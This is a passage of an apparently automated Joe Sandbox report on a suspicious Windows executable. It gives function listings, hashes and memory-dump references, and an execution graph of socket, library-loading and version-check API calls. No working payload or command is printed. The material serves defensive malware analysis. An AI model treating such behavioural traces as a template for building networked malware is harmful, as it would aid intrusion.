                                                                                                                                                                                                                                                                    • Instruction ID: 00a2691f967975ab54d8655737ab6c6da1934f11a0290a7b323daf8c64e46c73
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE511972F0811186FB14FF64A955ABCB7A2AB00B78F910135DD5D62FE4DF78A441C720
                                                                                                                                                                                                                                                                    Function 00007FF7C26757EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                                    • Instruction ID: 627af490715124a0f5634124f0df7602637242585265ccb12e27d2101e46bf86
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A515E22E186818AFB10FF71A4503BDA3A2AB44B68F944535DE8D67B89DFB8D441C770
                                                                                                                                                                                                                                                                    Function 00007FF7C26620C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1956198572-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                    • Instruction ID: 38bfaddd78ebfa15609d57c5b25731316e19069fbbcc02f41ba43bb0ae00e2d6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D11E921A0C58682F754AF6AE5452BAD263EB987A0FC44030DF8917F9ECDBDD491C338
                                                                                                                                                                                                                                                                    Function 00007FF7C2685B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                                                                                                    • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                    • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                                                    • Instruction ID: 0ceaa519cdc4b31b14053640a7ae0d1c5edef379762368c9281ddd78c9de96e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D410612A08682C1FB60AF25A445379D692EB90BB8F944239EFDC16FD5DFBCD441CB20
                                                                                                                                                                                                                                                                    Function 00007FF7C2679084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C26790B6
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9CE
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C267A9B8: GetLastError.KERNEL32(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9D8
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7C266CC15), ref: 00007FF7C26790D4
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                    • API String ID: 3580290477-4248481541
                                                                                                                                                                                                                                                                    • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                                                    • Instruction ID: 491e795443bbf2011f6b9bd4d6362aefc3ab38454eb08626a6257a3be5a125c1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8417F32A09A42C5E754FF25A4400B8A3E6EB44BA4B954035E98E63F85DFBCE491C370
                                                                                                                                                                                                                                                                    Function 00007FF7C267CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                                                    • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                    • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                                    • Instruction ID: d846dfcdc70b74b2e437ac50950f86d31391642b2b8afa24462463046fdeb9cb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D041C772B18B8181DB20EF25F4443A9A761FB88BA4F954035EE8D97B94EF7CD441C760
                                                                                                                                                                                                                                                                    Function 00007FF7C267F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                                                    • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                    • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                                                    • Instruction ID: a000ec26833ea12dec27e375ca0018830e6a1e0d7b40ce0115051b4621239987
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A21B162A1868182EB20BF11E44466DA3B2FB84F54FE54035DACC63B94DFBCE945CB71
                                                                                                                                                                                                                                                                    Function 00007FF7C266FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                    • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                                    • Instruction ID: b3fb58a135ef8c04e6c2fd541d6bdb08b19f7ee3a4973e327c7f56b8e3f73abc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24115B32618B8182EB609F25F440269B7E2FB88BA4F984230DACD17B69DF7CD551CB10
                                                                                                                                                                                                                                                                    Function 00007FF7C26807AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                                                    • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                    • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                                    • Instruction ID: ef2d2fd69645b69c9cc40cdd2b04bc3d0f9aee12e8756f2a5d2b6db343cc2762
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B001716291C642C5F760BF60A46627EA3A1EF44B28FC00436D5CDA6B91EFBCE554CB34

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:2.4%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                    Signature Coverage:1.5%
                                                                                                                                                                                                                                                                    Total number of Nodes:1218
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:102
                                                                                                                                                                                                                                                                    execution_graph 101366 7ffb1ba4718c 101368 7ffb1ba4722e 101366->101368 101367 7ffb1ba474ab 101368->101367 101370 7ffb1ba47365 getaddrinfo 101368->101370 101371 7ffb1ba4738d 101368->101371 101369 7ffb1ba4752f FreeAddrInfoW 101369->101367 101375 7ffb1ba47388 101370->101375 101371->101367 101371->101369 101373 7ffb1ba474a5 FreeAddrInfoW 101373->101367 101374 7ffb1ba4746a 101374->101367 101374->101373 101375->101371 101375->101374 101376 7ffb1ba44864 12 API calls 101375->101376 101376->101375 101377 7ffb0c031230 GetSystemInfo 101378 7ffb0c031264 101377->101378 101379 7ffb1b6f2810 101381 7ffb1b6f2834 101379->101381 101382 7ffb1b6f29ae 101381->101382 101384 7ffb1b6f2ae0 101381->101384 101383 7ffb1b6f2938 101385 7ffb1b6f2b42 101384->101385 101386 7ffb1b6f2d5b 101385->101386 101390 7ffb1b6f2e06 101385->101390 101393 7ffb1b6f3d10 101385->101393 101391 7ffb1b6f2d71 101386->101391 101403 7ffb1b6fdbbc 12 API calls 101386->101403 101389 7ffb1b6f2dcb 101389->101383 101390->101383 101402 7ffb1b6f5c20 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 101391->101402 101394 7ffb1b6f3d5f 101393->101394 101400 7ffb1b6f3e0a 101393->101400 101395 7ffb1b6f8be1 00007FFB2ADA3440 00007FFB2ADA3440 101394->101395 101396 7ffb1b6f3dc5 00007FFB1D8942B0 101394->101396 101397 7ffb1b6f8c0c GetLastError SetLastError 101394->101397 101394->101400 101395->101397 101396->101400 101398 7ffb1b6f8c37 GetLastError SetLastError 101397->101398 101399 7ffb1b6f8c51 00007FFB2ADA3440 00007FFB2ADA3440 101398->101399 101399->101400 101400->101395 101400->101398 101400->101399 101401 7ffb1b6f3e36 101400->101401 101401->101386 101402->101389 101403->101391 101404 7ffb0c1a5b40 101405 7ffb0c1a5b5f 101404->101405 101406 7ffb0c1a5cf3 101405->101406 101407 7ffb0c1a5c7f 00007FFB2ADB6A30 101405->101407 101407->101406 101408 7ffb0c1a5c9d 00007FFB2ADB6A30 101407->101408 101408->101406 101409 7ffb0c1a5cbb 00007FFB2ADB6A30 101408->101409 101409->101406 101410 7ffb0c1a5cd9 00007FFB2ADB6A30 101409->101410 101410->101406 101420 7ffb1b6f430c 101421 7ffb1b6f4336 101420->101421 101422 7ffb1b6f4376 LoadLibraryExW 101421->101422 101424 7ffb1b6f4395 101421->101424 101423 7ffb1b6f926c GetLastError 101422->101423 101422->101424 101423->101424 101434 7ffb1ba462fc 101435 7ffb1ba4634d 101434->101435 101437 7ffb1ba4635b 101435->101437 101438 7ffb1ba46254 101435->101438 101439 7ffb1ba4625d 101438->101439 101440 7ffb1ba46261 101438->101440 101439->101437 101442 7ffb1ba45190 101440->101442 101444 7ffb1ba451c7 101442->101444 101445 7ffb1ba4523f WSAGetLastError 101444->101445 101446 7ffb1ba45237 WSAGetLastError 101444->101446 101447 7ffb1ba451ef 101444->101447 101448 7ffb1ba452ac WSAGetLastError 101444->101448 101449 7ffb1ba452a4 WSAGetLastError 101444->101449 101450 7ffb1ba452cc WSAGetLastError 101444->101450 101454 7ffb1ba462b4 101444->101454 101457 7ffb1ba46894 101444->101457 101460 7ffb1ba44594 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind select 101444->101460 101445->101444 101445->101447 101446->101445 101447->101439 101448->101444 101449->101448 101450->101444 101451 7ffb1ba452e1 WSAGetLastError 101450->101451 101451->101444 101451->101447 101455 7ffb1ba462ca 101454->101455 101456 7ffb1ba462d8 recv 101454->101456 101455->101456 101456->101444 101458 7ffb1ba468aa 101457->101458 101459 7ffb1ba468b8 send 101457->101459 101458->101459 101459->101444 101460->101444 101461 7ffb1ba450c0 101468 7ffb1ba43dd0 101461->101468 101464 7ffb1ba4517e 101465 7ffb1ba45100 101466 7ffb1ba45130 bind 101465->101466 101467 7ffb1ba45152 101465->101467 101466->101467 101486 7ffb1ba42a00 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 101467->101486 101469 7ffb1ba43e03 101468->101469 101471 7ffb1ba440de 101468->101471 101470 7ffb1ba43e0c 101469->101470 101472 7ffb1ba43fd9 101469->101472 101473 7ffb1ba43e15 101470->101473 101476 7ffb1ba43f65 101470->101476 101485 7ffb1ba43e1a 101471->101485 101489 7ffb1ba44c58 8 API calls 101471->101489 101472->101485 101488 7ffb1ba44c58 8 API calls 101472->101488 101482 7ffb1ba43ef5 UuidFromStringW 101473->101482 101473->101485 101476->101485 101487 7ffb1ba44b6c 00007FFB2ADB4340 101476->101487 101478 7ffb1ba44197 101479 7ffb1ba441cb htons 101478->101479 101478->101485 101479->101485 101480 7ffb1ba44062 101481 7ffb1ba440af htons htonl 101480->101481 101480->101485 101481->101485 101483 7ffb1ba43f0d 101482->101483 101484 7ffb1ba43f38 UuidFromStringW 101483->101484 101483->101485 101484->101485 101485->101465 101486->101464 101487->101485 101488->101480 101489->101478 101490 7ffb1ba410c0 WSAStartup 101491 7ffb1ba41106 00007FFB0C3D20F0 101490->101491 101494 7ffb1ba42890 101490->101494 101495 7ffb1ba41139 101491->101495 101493 7ffb1ba428a2 101499 7ffb1ba42a00 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 101494->101499 101495->101494 101496 7ffb1ba427bb VerSetConditionMask VerSetConditionMask VerSetConditionMask 101495->101496 101497 7ffb1ba4280b VerifyVersionInfoA 101496->101497 101497->101494 101498 7ffb1ba42829 101497->101498 101498->101494 101498->101497 101499->101493 101500 7ffb0c1a6090 101502 7ffb0c1a60da 101500->101502 101505 7ffb0c1a61cd 101502->101505 101507 7ffb0c1a6360 101502->101507 101504 7ffb0c1a61e9 101506 7ffb0c1ad333 101505->101506 101516 7ffb0c1ab510 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 101505->101516 101506->101506 101508 7ffb0c1a63a6 101507->101508 101510 7ffb0c1a63d1 101508->101510 101513 7ffb0c1a6655 101508->101513 101518 7ffb0c1a4270 00007FFB0C058F60 101508->101518 101511 7ffb0c1a650f 00007FFB0C2F805C 101510->101511 101510->101513 101512 7ffb0c1a6523 00007FFB0C2F805C 101511->101512 101511->101513 101512->101513 101514 7ffb0c1a6537 101512->101514 101513->101505 101514->101513 101517 7ffb0c1a3fd0 00007FFB0C058F60 101514->101517 101516->101504 101517->101513 101518->101510 101519 7ffb0c080d10 101520 7ffb0c080d3c 101519->101520 101530 7ffb0c080d41 101519->101530 101532 7ffb0c0a4960 101520->101532 101522 7ffb0c080e44 101523 7ffb0c080ea0 101522->101523 101524 7ffb0c080e8a 101522->101524 101528 7ffb0c080e48 101522->101528 101539 7ffb0c02a500 9 API calls 101523->101539 101538 7ffb0c02a500 9 API calls 101524->101538 101527 7ffb0c080e31 101527->101522 101537 7ffb0c0bffc0 13 API calls new[] 101527->101537 101530->101522 101530->101527 101530->101528 101536 7ffb0c0be170 10 API calls new[] 101530->101536 101533 7ffb0c0a4979 101532->101533 101535 7ffb0c0a4985 101532->101535 101540 7ffb0c0a4890 101533->101540 101535->101530 101536->101527 101537->101522 101538->101528 101539->101528 101541 7ffb0c0a48ca 101540->101541 101544 7ffb0c0a48da 101540->101544 101546 7ffb0c0a43d0 101541->101546 101543 7ffb0c0a492d 101543->101535 101544->101543 101545 7ffb0c0a43d0 45 API calls 101544->101545 101545->101544 101578 7ffb0c0a40d0 101546->101578 101548 7ffb0c0a44ba 101652 7ffb0c152900 101548->101652 101549 7ffb0c0a448c 101549->101548 101558 7ffb0c0a4578 101549->101558 101561 7ffb0c0a455e 101549->101561 101609 7ffb0c043790 101549->101609 101550 7ffb0c0a485b 101651 7ffb0c081280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 101550->101651 101554 7ffb0c0a487b 101554->101544 101556 7ffb0c0a4514 101557 7ffb0c0a451a 101556->101557 101556->101558 101557->101561 101644 7ffb0c026840 9 API calls new[] 101557->101644 101560 7ffb0c0a461d 101558->101560 101563 7ffb0c0a45e1 101558->101563 101645 7ffb0c026840 9 API calls new[] 101560->101645 101561->101548 101561->101550 101650 7ffb0c026c40 9 API calls 101561->101650 101562 7ffb0c0a4547 101562->101561 101566 7ffb0c0a454f 00007FFB1C263010 101562->101566 101565 7ffb0c0a46f6 101563->101565 101568 7ffb0c0a473c 101563->101568 101574 7ffb0c0a4601 101563->101574 101646 7ffb0c026840 9 API calls new[] 101565->101646 101566->101561 101616 7ffb0c029170 101568->101616 101573 7ffb0c0a47a7 101575 7ffb0c0a47d5 101573->101575 101647 7ffb0c07e490 44 API calls 101573->101647 101574->101561 101649 7ffb0c044b80 29 API calls 101574->101649 101575->101574 101648 7ffb0c081310 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 101575->101648 101579 7ffb0c0a40f2 101578->101579 101595 7ffb0c0a4384 101578->101595 101580 7ffb0c0a40fb 101579->101580 101583 7ffb0c0a4113 101579->101583 101659 7ffb0c0a3fc0 9 API calls 101580->101659 101582 7ffb0c0a4106 101582->101549 101586 7ffb0c0a4152 101583->101586 101589 7ffb0c0a4303 101583->101589 101585 7ffb0c0a41a4 101661 7ffb0c0a4c70 101585->101661 101586->101585 101660 7ffb0c0a3fc0 9 API calls 101586->101660 101589->101595 101702 7ffb0c0a3fc0 9 API calls 101589->101702 101590 7ffb0c0a4258 101698 7ffb0c029340 9 API calls 101590->101698 101593 7ffb0c0a420b 101695 7ffb0c026c40 9 API calls 101593->101695 101594 7ffb0c0a4269 101699 7ffb0c029340 9 API calls 101594->101699 101595->101549 101597 7ffb0c0a42a2 101700 7ffb0c055950 38 API calls 101597->101700 101599 7ffb0c0a4213 101599->101590 101599->101595 101599->101597 101600 7ffb0c0a4215 101600->101599 101696 7ffb0c0e3ba0 11 API calls 101600->101696 101602 7ffb0c0a4293 101602->101549 101604 7ffb0c0a4226 101697 7ffb0c0a3fc0 9 API calls 101604->101697 101606 7ffb0c0a42ce 101701 7ffb0c0e22e0 29 API calls 101606->101701 101608 7ffb0c0a42f4 101608->101549 101613 7ffb0c0437c7 101609->101613 101610 7ffb0c043829 101610->101556 101613->101610 101740 7ffb0c043370 101613->101740 101749 7ffb0c03a650 RaiseException IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 101613->101749 101750 7ffb0c0436c0 9 API calls 